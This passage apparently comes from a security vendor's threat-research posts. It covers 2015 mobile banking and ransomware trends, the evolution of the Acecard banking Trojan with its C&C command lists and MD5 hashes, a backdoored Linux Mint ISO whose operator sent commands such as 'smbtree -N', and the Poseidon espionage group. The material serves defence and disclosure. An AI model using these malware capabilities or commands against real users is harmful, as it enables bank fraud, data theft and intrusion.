Four places in the TOP 20 are occupied by Trojans that steal money from mobile or bank accounts as their main method of monetization. They are Trojan-SMS.AndroidOS.Podec.a, Trojan-SMS.AndroidOS.OpFake.a, Trojan.AndroidOS.Mobtes.b and Backdoor.AndroidOS.Obad.f. Trojan-SMS.AndroidOS.Podec.a (11.2%) is in second place. This Trojan remained among the top three most popular mobile threats throughout 2015. To recap, the latest versions of this Trojan no longer send paid text messages. The Trojan is now fully focused on paid subscriptions, making use of CAPTCHA recognition. Trojan-SMS.AndroidOS.OpFake.a (5.6%) in 7th place is another long-term resident of the TOP 20. In 2014 it finished in 8th place and remained in the rating throughout all of 2015.

Yet another Trojan – Trojan-Ransom.AndroidOS.Small.o (1.9%) – blocks the victim’s phone and extorts money to unblock it. This mobile Trojan-Ransom program was very popular at the end of 2015 and became the only ransomware program to make the TOP 20. It first appeared in the ranking in the third quarter of 2015 in 11th place; it came 19th in the overall TOP 20 for 2015. The Trojan mostly spreads as a porn video player and targets Russian-speaking audiences.

More than half (12 out of 20) of the entries in the ranking are Trojans that use aggressive advertising as their primary means of monetization. They are Trojan-Downloader.AndroidOS.Leech.a, Trojan-Spy.AndroidOS.Agent.el, Trojan-Dropper.AndroidOS.Gorpo.a, Trojan.AndroidOS.Fadeb.a, and two modifications each of Trojan.AndroidOS.Guerrilla, Trojan.AndroidOS.Rootnik, Trojan.AndroidOS.Ztorg and Backdoor.AndroidOS.Ztorg. Unlike the usual advertising modules, these programs do not contain any useful functionality. Their goal is to deliver as many adverts as possible to the recipient using a variety of methods, including the installation of new advertising programs. These Trojans can use super-user privileges to conceal their presence in the system folder, from where it will be very difficult to dislodge them. We have come across such Trojans before, mostly in China. There was a burst of activity by these programs in 2015: most of them targeting users in China, although these Trojans have started being actively distributed worldwide. The code of the Trojans often contained the word oversea.

The other two places in the TOP 20 are occupied by Exploit.AndroidOS.Lotoor modifications used to obtain local super-user privileges.

Mobile banking Trojans

In 2015, we detected 7,030 mobile banking Trojans, which is 2.6 times less than in 2014 when 16,586 were detected. It should be noted that although the number of new malware programs fell from the previous year, these programs have become more adept and malign, and the areas of interest among cybercriminals now includes banks in numerous countries. Many mobile banking Trojans act independently, without any computer component, and target customers of dozens of banks around the world.

Number of mobile banking Trojans detected by Kaspersky Lab solutions in 2015

56,194 users were attacked by mobile banking Trojans at least once during the year.

Geography of mobile bankers

The number of attacked countries is growing: attacks by mobile banking Trojan were registered in 137 countries and territories worldwide vs 90 countries in 2014.

Geography of mobile banking threats in 2015 (number of users attacked)

Top 10 countries attacked by mobile banking Trojans (ranked by number of users attacked):

Country Number of users attacked 1 Russia 45690 2 Germany 1532 3 Ukraine 1206 4 US 967 5 Kazakhstan 804 6 Australia 614 7 South Korea 527 8 France 404 9 Belarus 380 10 Poland 324

As in the previous year, Russia topped the rating of countries attacked by mobile banking Trojans. Among the newcomers were South Korea, Australia, France and Poland. Lithuania, Azerbaijan, Bulgaria and Uzbekistan left the TOP 10.

Just how popular mobile banking Trojans are with cybercriminals in each country can be shown by the percentage of users who were attacked by these Trojans during the reporting period, relative to all attacked users.

TOP 10 countries by the percentage of users attacked by mobile banking Trojans relative to all attacked users

Country % of all attacked users* 1 South Korea 13.8 2 Australia 8.9 3 Russia 5.1 4 Austria 3.0 5 Belarus 1.9 6 US 1.8 7 Tajikistan 1.7 8 Ukraine 1.6 9 France 1.6 10 Uzbekistan 1.6

* Percentage of users attacked by mobile banking Trojans, relative to all attacked users of Kaspersky Lab’s mobile security products in the country.

A substantial portion of mobile banking attacks in South Korea were caused by representatives of the Trojan-Banker.AndroidOS.Wroba family. These Trojans are designed to steal mobile bank accounts of the largest Korean banks as well as mTans.

In Australia, the Trojan-Banker.AndroidOS.Acecard family was responsible for most infection attempts. This family is a new stage in the evolution of Backdoor.AndroidOS.Torec.a, the first Trojan for Android that made use of Tor. We detected this Trojan at the beginning of 2014, while the first banking modifications appeared in mid-2014. At that time the Trojan was distributed mainly in Russia, and only in 2015 did it begin to spread actively in Australia. One modification, which we detected in November 2015, is able to overlay the interfaces of 24 banking apps with a phishing window. Five of those apps belong to Australian banks, another four each belong to banks based in Hong Kong, Austria and New Zealand, three each to banks in Germany and Singapore, plus the PayPal app. In addition, there are modifications which target banks in the US and Russia.

Phishing windows of the Acecard Trojan

Stealing user logins and passwords by displaying a phishing window instead of the genuine app interface is not a new trick. We first came across it back in 2013 in Trojan-SMS.AndroidOS.Svpeng. In our IT threat evolution in Q1 2015 report we mentioned Trojan-SMS.AndroidOS.OpFake.cc which was capable of attacking at least 29 banking and financial apps. The latest modification of this Trojan can now attack 114 banking and financial apps. Its main goal is to steal the login credentials for bank accounts. It also overlays the windows of several popular mail applications.

In Russia, which ranked third in the TOP 10, Trojan-Banker.AndroidOS.Faketoken and Trojan-Banker.AndroidOS.Marcher were the most popular programs used by attackers. Starting in April, we saw a sharp drop in the number of attempts to infect users with representatives of the Trojan-Banker.AndroidOS.Marcher family. During the five months from April to August, the number of attacks using this Trojan decreased fivefold. It is possible that the cybercriminals were preparing attacks on users in other countries during that time, because until September 2015 activity by this family was limited almost exclusively to Russia. From September, however, about 30% of the attacks using this Trojan targeted users in Australia, Germany and France.

The aforementioned Trojan-Spy.AndroidOS.SmsThief.fc was distributed in Russia. The attackers added their code to the original banking app without affecting its performance, making this Trojan more difficult to detect.

Mobile Trojan-Ransom

In 2015, the amount of the Trojan-Ransom families doubled compared to 2014. The number of modifications detected during the same period increased 3.5 times and accounted for 6,924.

Over the reporting period, mobile ransomware attacked 94,344 unique users which is five times more than in 2014 (18,478). The share of unique users attacked by Trojan-Ransom programs relative to all users attacked by mobile malware increased from 1.1% to 3.8% during the year.

Mobile ransomware attacks were registered in 156 countries and territories at least once during the year.

Geography of mobile ransomware threats in 2015 (number of users attacked)

TOP 10 countries attacked by Trojan-Ransom malware by the number of attacked users:

Country Number of attacked users 1 Russia 44951 2 Germany 15950 3 Kazakhstan 8374 4 US 5371 5 Ukraine 4250 6 UK 2878 7 Italy 1313 8 Spain 1062 9 Iran 866 10 India 757

Russia, Germany and Kazakhstan were the countries attacked most often by ransomware.

In Russia and Kazakhstan, the Trojan-Ransom.AndroidOS.Small family was most active, in particular the modification Trojan-Ransom.AndroidOS.Small.o, the most popular Trojan-Ransom program in 2015.

The Trojan-Ransom.AndroidOS.Pletor family also remained very popular in 2015. Interestingly, this first mobile encryptor Trojan was developed by the same group of cybercriminals as Trojan-Banker.AndroidOS.Acecard.

In Germany, Trojan-Ransom.AndroidOS.Fusob was the most actively distributed family.

Windows opened by the Fusob Trojan

The US came fourth in the ranking. The Trojan-Ransom.AndroidOS.Fusob family was especially popular in the country, although the Trojan-Ransom.AndroidOS.Svpeng family was also actively used.

This ranking depends to a large extent on the number of users in each country, so it is interesting to view a rating that shows the proportion of users attacked by Trojan-Ransom malware relative to all attacked users in the country.

TOP 10 countries attacked by Trojan-Ransom malware – share of users relative to all attacked users in the country.

Country % of all attacked users* 1 Kazakhstan 15.1 2 Germany 14.5 3 US 10.3 4 Canada 8.9 5 Netherlands 8.8 6 UK 8.3 7 Switzerland 6.9 8 Austria 6.4 9 Ukraine 5.9 10 Australia 5.5

* Percentage of users attacked by Trojan-Ransom malware, relative to all attacked users of Kaspersky Lab’s mobile security products in the country

Russia, which accounted for the largest number of attacked users, was not in the TOP 10. The leaders of the ranking were Kazakhstan, Germany and the US.

Conclusion

Despite the fact that the first advertising Trojans exploiting super-user privileges for their own purposes appeared a few years ago, in 2015 their number increased substantially and started spreading rapidly. In the first quarter of 2015 the most popular threats included just one Trojan of this type, but by the end of the year these programs accounted for more than half of the TOP 20. They are distributed using all available means – via other advertising programs, via app stores and can be even pre-installed in some devices. The number of advertising Trojans using super-user privileges will most likely continue to grow in 2016.

We have already seen cases when advertising Trojans were used to spread malicious mobile programs. There is every reason to believe that attackers will increasingly use these Trojans to infect mobile devices with malware.

We also came across cases where super-user privileges were utilized by other types of malware, especially ransomware.

Trojan-Ransom malware is likely to continue evolving in 2016. We expect the popularity of these programs among attackers to grow and their global reach to increase.

Another type of Trojan that we intend to continue monitoring closely in 2016 is Trojan-Banker. There are already lots of banking Trojans that do not require additional software on the victim’s computer. These Trojans operate independently, and only need to infect the user’s phone to steal his money. They are able to steal logins and passwords for mobile banking accounts by overlaying the legitimate banking app interfaces with a phishing window. The Trojans can also steal credit card data using phishing windows. In addition, they have functionality to intercept communications between a client and a bank – stealing incoming text messages and forwarding calls to the attacker. In 2016, banking Trojans will attack even more banking institutions and will use new distribution channels and new data theft technologies.

As the functionality of mobile devices and mobile services grows, the appetite of cybercriminals who profit from mobile malware will grow too. Malware authors will continue to improve their creations, develop new technologies and look for new ways of spreading mobile malware. Their main aim is to make money. In these circumstances, neglecting to protect your mobile devices is extremely risky.

The Evolution of Acecard

Malware Alerts - Mon, 02/22/2016 - 09:53

While working on the IT Threat Evolution report for Q3 2015, we discovered that Australia had become the leading country in terms of number of users attacked by mobile banker Trojans. We decided to find out what was behind this jump in activity and managed to identify the cause: Trojan-Banker.AndroidOS.Acecard. This family accounted for almost all the banker Trojan attacks in Australia.

After analyzing all the known malware modifications in this family, we established that they attack a large number of different applications. In particular, the targets include nine official social media apps that the Trojan attacks in order to steal passwords. Two other apps are targeted by the Trojan for their credit card details. But most interestingly, the list includes nearly 50 financial apps (client software for leading global payment systems and banks) and services, and the various modifications of Acecard make use of all the tools at their disposal to attack them – from stealing bank text messages to overlaying official app windows with phishing messages.

Here is another interesting fact that we established while investigating the Trojan: the modifications of Acecard were written by the same cybercriminals who earlier created Backdoor.AndroidOS.Torec.a, the first TOR Trojan for Android, as well as Trojan-Ransom.AndroidOS.Pletor.a, the first encryptor for mobile devices. All three Trojans run on Android.

How it all started

Given Acecard’s growing popularity and the rich criminal past of its creators, we decided to delve deeper into the history of this malware family.

It all started with Backdoor.AndroidOS.Torec.a. The first version of this malicious program was detected in February 2014 and could perform the following commands from the C&C server:

  • #intercept_sms_start – start intercepting incoming SMSs;
  • #intercept_sms_stop – stop intercepting incoming SMSs;
  • #ussd – create a USSD request;
  • #listen_sms_start – start stealing incoming SMSs;
  • #listen_sms_stop – stop stealing incoming SMSs;
  • #check – send information about the phone (phone number, country of residence, IMEI, model, OS version) to C&C;
  • #grab_apps – send a list of applications installed on the mobile device to the C&C;
  • #send_sms – send an SMS to numbers specified in the command;
  • #control_number – change the phone’s control number.

Then, in April 2014, a new version emerged with more capabilities. The additional commands were:

  • #check_gps – send the device’s coordinates to the C&C;
  • #block_numbers – add numbers to the SMS interception list;
  • #unblock_all_numbers – clear the SMS interception list;
  • #unblock_numbers – remove specified numbers from the SMS interception list;
  • #sentid – send an SMS with the Trojan’s ID to a specified number.

In late May 2014, we detected the first mobile encryptor, Trojan-Ransom.AndroidOS.Pletor.a. It encrypted files on the device and demanded a ransom for them to be decrypted. Some modifications of Pletor used TOR to communicate with the C&C.

A month later, we detected a new modification, Backdoor.AndroidOS.Torec. Unlike previous versions, it did not use TOR and targeted credit card details: the Trojan overlaid the official Google Play Store app with a phishing window that included data entry fields.

We assigned the verdict Trojan-Banker.AndroidOS.Acecard.a to this modification, and classified it as a separate family of malware. From that moment on, all new versions of the Trojan have been detected as belonging to the Acecard family.

An analysis and comparison of the code used in Backdoor.AndroidOS.Torec.a, Trojan-Ransom.AndroidOS.Pletor.a and Trojan-Banker.AndroidOS.Acecard.a has shown they were all written by the same cybercriminals. Here are some clear examples:

Code from the SmsProcessor class of the Trojan Backdoor.AndroidOS.Torec.a

Code from the SmsProcessor class of Trojan-Banker.AndroidOS.Acecard.a

Code from the SmsProcessor class of Trojan-Ransom.AndroidOS.Pletor.a

Here is another example:

Code from the SmsProcessor class of the Trojan Backdoor.AndroidOS.Torec.a

Code from the SmsProcessor class of Trojan-Banker.AndroidOS.Acecard.a

Code from the SmsProcessor class of Trojan-Ransom.AndroidOS.Pletor.a

A lot of the class, method and variable names are the same for all three Trojans. The code of the corresponding methods is either the same or very similar with only minor differences.

Acecard’s progress

The initial Trojan, Trojan-Banker.AndroidOS.Acecard.a, could only handle four commands sent from the C&C:

  • #intercept_sms_start – start intercepting incoming SMSs;
  • #intercept_sms_stop – stop intercepting incoming SMSs;
  • #send_sms – send an SMS to the number specified in the command;
  • #control_number – change the phone’s control number.

The next modification of Acecard was detected in late August 2014 and used the TOR network for C&C communication, just like the earlier Pletor. Besides that, we identified two more differences. Firstly, the list of supported commands had grown to 15; nearly all of these commands had been seen before in earlier versions of the Trojan Torec:

  • #intercept_sms_start – start intercepting incoming SMSs;
  • #intercept_sms_stop – stop intercepting incoming SMSs;
  • #ussd – create a USSD request;
  • #check_gps – send the device’s coordinates to the C&C;
  • #block_numbers – add numbers to the list of senders from which SMSs will be intercepted;
  • #unblock_all_numbers – clear the SMS interception list;
  • #unblock_numbers – remove specified numbers from the SMS interception list;
  • #listen_sms_start – start stealing incoming SMSs;
  • #listen_sms_stop – stop stealing incoming SMSs;
  • #check – send the Trojan’s ID to the C&C;
  • #grab_apps – send the list of applications installed on the mobile device to the C&C;
  • #send_sms – send an SMS to the number specified in the command;
  • #control_number – change the phone’s control number;
  • #sentid – send an SMS with the Trojan’s ID to a specified number;
  • #show_dialog – show a dialog window to the user with specific objects (data entry fields, buttons etc.) depending on the C&C command parameters.

The second difference was the number of phishing windows. Along with the official Google Play Store app, this Trojan now overlaid the display of the following apps with its own windows:

  • IM services: WhatsApp, Viber, Instagram, Skype;

  • The apps of the VKontakte, Odnoklassniki and Facebook social networks

  • The Gmail client

  • The official Twitter client

In the second half of October 2014, we detected the next modification of Acecard. It no longer used TOR (neither have any of the versions of the Trojan subsequently detected). However, there was another, more important difference: starting with this version of the Trojan, there have been dramatic changes in the geography of the targeted users. The earlier versions mostly attacked users in Russia, but starting in October 2014 the bulk of Acecard attacks targeted users in Australia, Germany and France. Russia accounted for just 10% of the attacked users. This trend continued for another four months, until February 2015, but even then Australia, Germany and France still remained among the most frequently attacked countries.

At the same time, the geography of Pletor attacks remained largely unchanged: most attacks targeted, and continue to target, users in Russia and the US. The TOP 5 most attacked countries also includes Ukraine, Belarus and Saudi Arabia.

A new modification of Acecard emerged in mid-November 2014. As well as stealing passwords from popular social network clients, it started to overlay the banking app of Australia’s most popular bank with a phishing window. Just two days later, we managed to detect another modification of this Trojan that was already attacking the apps of four Australian banks.

This functionality has persisted up to the very latest Trojan-Banker.AndroidOS.Acecard modifications that we detect.

This version of Acecard also checks the country code and the service provider code as it launches, and if it finds itself in Russia, it shuts down. This check is carried out in almost all subsequent modifications. Interestingly, similar changes to Trojan-Ransom.AndroidOS.Pletor only took place in late March 2015, and did not extend to all versions of the malware.

For the next nine months, there was practically no change in the functionality of the new Acecard modifications that emerged, until early August 2015 when we detected a new version that was capable of overlaying the PayPal mobile app with its own phishing window.

There was also a new command that this version could perform – #wipe. When this command is received, Acecard resets the mobile device to factory settings.

It should be noted that there has been a dramatic increase in Acecard developer activity since June 2015. Before, we typically identified 2-5 files a month related to this Trojan; since June we have detected around 20 files per month.

Number of Acecard files detected each month

The graph above shows the number of files associated with the banking Trojan Acecard that are detected each month; these include both the modifications of Acecard and related files, such as downloader Trojans. The dramatic rise in file numbers detected in November and especially December is down to the malware writers making active use of a commercial code obfuscator and the emergence of obfuscated versions of the Trojan.

Also at this time, there was an increase in the number of attacks using this malicious program.

The number of unique users attacked by Acecard per month

In the first half of September, we detected a new modification of Acecard. Its new capabilities included overlaying the windows of more mobile banking apps, including those of one Australian bank, four New Zealand banks and three German banks.

It means this modification of the Trojan is capable of overlaying 20 apps – including 13 banking apps – with a phishing window.

The subsequent development of Acecard’s “banking business” then got even faster:

  • The next modification emerged just several days later, and was capable of overlaying as many as 20 banking applications. The list of targeted apps grew to include another app belonging to an Australian bank, four apps for Hong Kong banks and three for Austrian banks.
  • In late September, a new modification came out with a new functionality: the malicious program included a list of bank phone numbers, so text messages arriving from those banks are redirected to the cybercriminal. The Trojan has a list of phrases, so it can compare incoming text messages and identify those with verification codes for bank operations or registration, and send just the code to the cybercriminal, rather than the full SMS. This version of Acecard intercepts SMSs from 17 Russian banks.
  • Early October saw the emergence of a new modification that attacked the banking apps of the three largest US banks. Interestingly, from the very start, the US has been among the TOP 10 countries most often attacked by this Trojan; however, December 2015 saw a dramatic rise in the number of attacks on US users. In that month, the US came third in terms of the number of unique users attacked by this malware.
  • In mid-October, a new modification appeared capable of overlaying as many as 24 financial applications, including apps belonging to five Australian banks, four Hong Kong banks, four Austrian banks, four New Zealand banks, three German banks, three Singapore banks, and the PayPal app.
  • A new modification was detected in early November that has a phishing window that targets an app belonging to a Spanish bank.

It should also be noted that virtually all versions of Acecard can handle a C&C command that orders the Trojan to overlay any specified app with its own window. Perhaps the cybercriminals thought this option was more promising, because many of the versions detected in November and December 2015 have a dedicated window that only overlays Google Play and Google Music apps to target credit card details. No other applications will be overlaid without first receiving the appropriate C&C command.

The most recent versions of the Acecard family can attack the client applications of more than 30 banks and payment systems. Considering that these Trojans are capable of overlaying any application upon command, the overall number of attacked financial applications may be much larger.

Although the Trojans belonging to this family can attack users from a long list of countries, most attacks target users in Russia, Australia, Germany, Austria and France.

Number of unique users attacked by country

In Germany and Australia, the Trojan-Banker.AndroidOS.Acecard family is the most widespread type of mobile banker Trojan targeting users.

Propagation

In many countries, Trojans belonging to the Acecard family are typically distributed with the names Flash Player or PornoVideo, although other names are sometimes used in a bid to imitate useful and popular software. This malware family also propagates with the help of downloader Trojans that are detected by Kaspersky Lab’s products as Trojan-Downloader.AndroidOS.Acecard.

We should note that on 28 December we were able to spot a version of the Acecard downloader Trojan – Trojan-Downloader.AndroidOS.Acecard.b – in the official Google Play Store.

A Trojan-Downloader.AndroidOS.Acecard.b page in Google Play Store

The Trojan propagates under the guise of a game, but in reality it has no useful functionality. The main goal of this malicious app is to download and install a fully functional modification of the banking Trojan Acecard. Its creators didn’t even bother to make it look like a legitimate application: when the malware is installed from Google Play, the user will only see an Adobe Flash Player icon on the desktop screen.

We have also been able to detect a new modification of the downloader Trojan, Trojan-Downloader.AndroidOS.Acecard.c. It differs in that the Trojan, once launched, uses vulnerabilities in the system to gain super-user rights. With these privileges – Trojan-Downloader.AndroidOS.Acecard.c can install the banking Trojan Acecard into the system folder, which makes it impossible to delete using standard tools. However, in most cases this propagation method is used to spread another Trojan that we are already familiar with – Trojan-Ransom.AndroidOS.Pletor.

The cybercriminals are using virtually every available method to propagate the banking Trojan Acecard, be it under the guise of another program, via official app stores, or via other Trojans. This combination of propagation methods, which includes the exploitation of vulnerabilities in the operating system, along with Acecard’s capabilities make this mobile banker one of the most dangerous threats to users.

MD5

58FED8B5B549BE7ECBFBC6C63B84A728
8D260AB2BB36AEAF5B033B80B6BC1E6A
CF872ACDC583FE80B8F54957E14355DF
FBBCCD640CE75BD618A7F3187EC1B742
01E8CEA7DF22B1B3CC560ACB049F8EA0
DDCE6CE143CCA26E59063E7A4BB89019
9D34FC3CFCFFEA760FC1ADD377AA626A
03DA636518CCAF432AB68B269F7E6CC3
05EBAA5C7FFA440455ECB3519F923B56
E3FD483AD3731DD62FBE027B4E6880E6
53888352A4A1E3CB810B2A3F51D0BFC2
E1C794A614D5F6AAC38E2AEB77B139DA
54332ED8EA9AED12400A75496972D7D7
5DB57F89A85F647EBBC5BAFBC29C801E
702770D70C7AAB793FFD6A107FD08DAD
CF25782CAC01837ABACBF31130CA4E75
07DF64C87EA74F388EF86226BC39EADF

Beware of Backdoored Linux Mint ISOs

Malware Alerts - Mon, 02/22/2016 - 05:00

Background

Yesterday a blog post on “The Linux Mint Blog” caught our attention. Apparently criminals managed to compromise a vulnerable instance of WordPress which the project used to run their website. The attackers modified download links pointing to backdoored ISO files of Linux Mint 17.3 Cinnamon edition. This “should only impact people who downloaded this edition on February 20th”, the author of the blog stated.

We managed to get our hands on the malware embedded in the ISO images. Let’s have a quick look.

Malware used

The criminals used a simple backdoor, which is controlled via an unencrypted IRC connection. We found five hardcoded C&C addresses. At the time of writing only one of them was available. We saw approx. 50 connected clients just in this channel called “#mint”:

The malware is capable of:

  • running several types of UDP and TCP flooding (used in DDoS attacks)
  • downloading arbitrary files to the victim’s machine
  • executing arbitrary commands on the machine

We’re detecting this type of malware as HEUR:Backdoor.Linux.Tsunami.bh.

According to user reports, the compromised ISO images come with the backdoor’s C-source code, located in /var/lib/man.cy, which is compiled on first startup to “apt-cache” and is then executed.

Activity

While monitoring the C&C channel, we saw the criminal sending several SMB-related commands like “smbtree -N” to the connected bots. Apparently the attacker tries to access SMB/CIFS shares available in the local network of the victims.

Conclusion

In order to detect this kind of attack, one should use PKI with strong cryptographic signatures to ensure the integrity of downloaded software.

Integrity-checks based on file hashes like MD5 or SHA256 are insecure if a project’s website is compromised, since the attacker could also adjust the checksums provided on the website.

Experts: what ATM jackpotting malware is

Malware Alerts - Mon, 02/15/2016 - 06:58

Kaspersky Lab security researchers Santiago Pontirol and Roberto Martinez explain how ATM malware works in Latin America and why it’s difficult to discover ‘jackpotting’ malware. Kaspersky Security Analyst Summit 2016 on Tenerife, Spain.

Expert: cross-platform Adwind RAT

Malware Alerts - Thu, 02/11/2016 - 05:12

Kaspersky Lab researcher Vitaly Kamluk gave a talk about the latest version of the cross-platform Adwind RAT. The remote access Trojan is unique in that it’s written in JavaScript, giving this version — which is also known as Frutas, AlienSpy and JSocket — the flexibility to be used liberally in cybercrime operations as well as in targeted attacks. From Kaspersky Security Analyst Summit 2016 on Tenerife, Spain.

More information:

  1. Adwind FAQ
  2. Full report PDF

Expert: How I hacked my hospital

Malware Alerts - Wed, 02/10/2016 - 07:28

Sergey Lozhkin, senior researcher at Kaspersky Lab’s GReAT gave a talk about several critical vulnerabilities he found in one hospital’s IT infrastructure. From Kaspersky Security Analyst Summit 2016 on Tenerife, Spain.

Poseidon Group: a Targeted Attack Boutique specializing in global cyber-espionage

Malware Alerts - Tue, 02/09/2016 - 05:27

During the latter part of 2015, Kaspersky researchers from GReAT (Global Research and Analysis Team) got hold of the missing pieces of an intricate puzzle that points to the dawn of the first Portuguese-speaking targeted attack group, named “Poseidon.” The group’s campaigns appear to have been active since at least 2005, while the very first sample found points to 2001. This signals just how long ago the Poseidon threat actor was already working on its offensive framework.

Why has the Poseidon threat remained undetected for so many years? In reality, it has not. Most samples were detected promptly. However, Poseidon’s practice of being a ‘custom-tailored malware implants boutique’ kept security researchers from connecting different campaigns under the umbrella of a single threat actor. This approach entails crafting campaigns components on-demand and sometimes fabricating entirely unique malicious artifacts.

1st Portuguese-speaking group #ThePoseidonAPT attacks companies globally #TheSAS2016

Tweet

Our research team was able to put together the disparate pieces of this puzzle by diligently tracing the evolution of Poseidon’s toolkit in pursuit of an overarching understanding of how the actor thinks and the specific practices involved in infecting and extorting its victims. With a set of tools developed for the sole purpose of information gathering and privilege escalation, the sophistication level of campaign highlights that, today, regional actors are not far behind better-known players in the global game of targeted attacks.

Becoming familiar with the operations of the Poseidon Group meant patiently dismantling their modus operandi to unearth the custom-designed infection tools deployed to each of their selected targets. This process revealed a series of campaigns with highly-regionalized malware practices and geographically-skewed victim tasking, unsurprising in a region with a gradually-maturing cybercrime industry. The proper detection of each iteration of their evolving toolkit may have been enough to thwart specific efforts, but to truly understand the magnitude of Poseidon’s combined operations required an archeological effort to match.

Frequently asked questions What exactly is the Poseidon Group?

The Poseidon Group is a long-running team operating on all domains: land, air, and sea. They are dedicated to running targeted attacks campaigns to aggressively collect information from company networks through the use of spear-phishing packaged with embedded, executable elements inside office documents and extensive lateral movement tools. The information exfiltrated is then leveraged by a company front to blackmail victim companies into contracting the Poseidon Group as a security firm. Even when contracted, the Poseidon Group may continue its infection or initiate another infection at a later time, persisting on the network to continue data collection beyond its contractual obligation. The Poseidon Group has been active, using custom code and evolving their toolkit since at least 2005. Their tools are consistently designed to function on English and Portuguese systems spanning the gamut of Windows OS, and their exfiltration methods include the use of hijacked satellite connections. Poseidon continues to be active at this time.

Why do you call it Poseidon’s Targeted Attack Boutique?

The presence of several text fragments found in the strings section of executable files belonging to the campaign reveal the actor’s fondness for Greek mythology, especially regarding Poseidon, the God of the Seas (which also coincides with their later abuse of satellite communications meant to service ships at sea). The boutique element is reflected in their artisanally adaptive toolkit for lateral movement and data collection which appears to change from infection to infection to fit custom-tailored requirements for each of their prospective clients. The business cycle includes what is euphemistically referred to as ‘financial forecasting’ using stolen information, so we like to say that Poseidon’s boutique not only deals in targeted attacks but also stolen treasures.

How did you become aware of this threat? Who reported it?

We noticed that several security companies and enthusiasts had unwittingly reported on fragments of Poseidon’s campaigns over the years. However, nobody noticed that these fragments actually belonged to the same threat actor. Perhaps because many of these campaigns were designed to run on specific machines, using English and Portuguese languages, with diverse command and control servers located in different countries and soon discarded, signing malware with different certificates issued in the name of rogue companies, and so on. By carefully collecting all the evidence and then reconstructing the attacker’s timeline, we found that it was actually a single group operating since at least 2005, and possible earlier, and still active on the market.

With this understanding, GReAT researchers were able to recognize similarities in obfuscation and development traits leading back to widely-reported but little understood variants on a sample in 2015, which searched for prominent leaders and secret documents involving them.

When did you discover this targeted attack?

The very first samples from this campaign were detected by Kaspersky Lab back in the early 2000s. However, as noted previously, it is a very complex task to correlate indicators and evidence in order to put together all the pieces of this intricate puzzle. By the middle of 2015 it was possible to identify that throughout this period of time it’s been the same threat actor, which we call Poseidon Group.

Who are the victims? / What can you say about the targets of the attacks?

The targets are companies in energy and utilities, telecommunications, public relations, media, financial institutions, governmental institutions, services in general and manufacturing. The geographical spread of victims is heavily-skewed towards Brazil, the United States, France, Kazakhstan, United Arab Emirates, India and Russia. Many of the victims have joint ventures or partner operations in Brazil. The importance of the victims is not measured in numbers since each of these victims is a large-scale (often multinational) enterprise.

What exactly is being stolen from the target machines?

One of the characteristics of the group behind Poseidon is an active exploration of domain-based networks. Such network topology is typical for companies and enterprises.

The highest value asset for these companies is proprietary information, technologies, and business-sensitive information that represents significant value in relation to investments and stock valuations. The Poseidon Group actively targets this sort of corporate environment for the theft of intellectual property and commercial information, occasionally focusing on personal information on executives.

How does Poseidon’s APT Boutique infect computers?

The main infection vector for Poseidon is the use of spear-phishing emails including RTF/DOC files, usually with a human resources lure. The executables are also often digitally signed and occasionally hidden in alternate data streams to fool security solutions. Poseidon’s toolkit displays an awareness of many antivirus providers over the years, attempting to attack or spoof these processes as a means of self-defense for their infections. Once the infection happens, it reports to the command and control servers before beginning a complex lateral movement phase. This phase will often leverage a specialized tool that automatically collects a wide array of information including credentials, group management policies, and even system logs to better hone further attacks and assure execution of their malware. This way the attackers actually know what applications and commands they can use without raising an alert to the network administrator during lateral movement and exfiltration.

What does the Poseidon Group do? What happens after a target machine is infected?

Once the target’s machine is compromised, the attacker first enumerates all processes running in the system and all services. Then the attacker looks for all administrator accounts on both the local machine and the network. This technique allows them to map network resources and make lateral movements inside the network, landing in the perfect machine to match the attacker’s interest. This reflects the Poseidon Group’s familiarity with Windows network administration. In many cases, their ultimate interest is the Domain Controller.

Additionally malware reports itself to its hardcoded command and control servers and established a backdoor connection, so the attacker may have a permanent remote connection.

What are the malicious tools used by the Poseidon Group? What are their functions?

Poseidon utilizes a variety of tools. Their main infection tool has been steadily evolving since 2005, with code remnants remaining the same to this day, while others have been altered to fit the requirements of new operating systems and specific campaigns. A noteworthy addition to the Poseidon toolkit is the IGT supertool (Information Gathering toolkit), a bulking 15 megabyte executable that orchestrates a series of different information collections steps, exfiltration, and the cleanup of components. This tool appears to be designed to operate on high-value corporate systems like Domain Controllers or IIS servers that act as repositories of valuable information, particularly for lateral movement. The Information Gathering Tool (IGT) tool is coded in Delphi and includes powershell and SQL components across a dozen different drops. This tool contains several other executable files made in different programming languages ranging from Visual Basic 6 to C#, each one performing a very clear task devised by the group when trying to obtain more information from an objective. The main purpose of the IGT tool is to make an inventory of the system, saving information from the network interfaces and addresses, credentials belonging to the Domain and database server, services being run from the OS and everything that could help the Poseidon Group make its attack more customized to its victim.

Are the attackers using any zero-day vulnerabilities?

No zero-day vulnerabilities have been found in the analysis of the samples obtained regarding this campaign. Poseidon’s conventional means of deceiving users with executable files posing inside Word and RTF document files, and actual poisoned documents with malicious macro-scripts has been the sole method used for compromising their desired targets. As we have seen in other targeted campaigns, social engineering and carefully crafted spear-phishing attacks play a crucial role in the effectiveness of getting a foothold in the desired system.

Is this a Windows-only threat? Which versions of Windows are targeted?

Poseidon is particularly focused on the Microsoft Windows operating system family, specifically customizing the infection method for each one so as to gather different information and hide its presence after the initial infection. Other products usually found in corporate environments, such as an SQL server, are being used for lateral movement and credential harvesting using a customized toolset designed by the crafty Poseidon Group. Because of Poseidon’s longevity, there are samples targeting Windows systems as early as Windows NT 4.0 Server and Windows 95 Workstation up to current versions like Windows 8.1, as well as server variants (very important to them, given the emphasis on reaching Domain Controllers in corporate environments.)

How is this different from any other targeted attack?

The extortion elements of this campaign are what set it apart from others. The exfiltration of sensitive data is done in order to coerce the victim into a business relationship under the threat of exchanging this information with competitors or leveraging it as part of the company’s offering of ‘investment forecasting’. Additionally this is the first ever publicly known Portuguese-speaking targeted attacks campaign.

Are there multiple variants of the Poseidon Group’s malware? Are there any major differences in the variants?

Poseidon has maintained a consistently evolving toolkit since the mid-2000s. The malware has not avoided detection but instead been so inconspicuous as to not arouse much suspicion due to the fact that this malware only represents the initial phase of the attack. An altogether different component is leveraged once Poseidon reaches an important machine like an enterprise’s Domain Controller. This is where the main collection takes place by use of the IGT (Information Gathering Tool) toolkit.

Is the command and control server used by the Poseidon Group still active? Have you been able to sinkhole any of the command and controls?

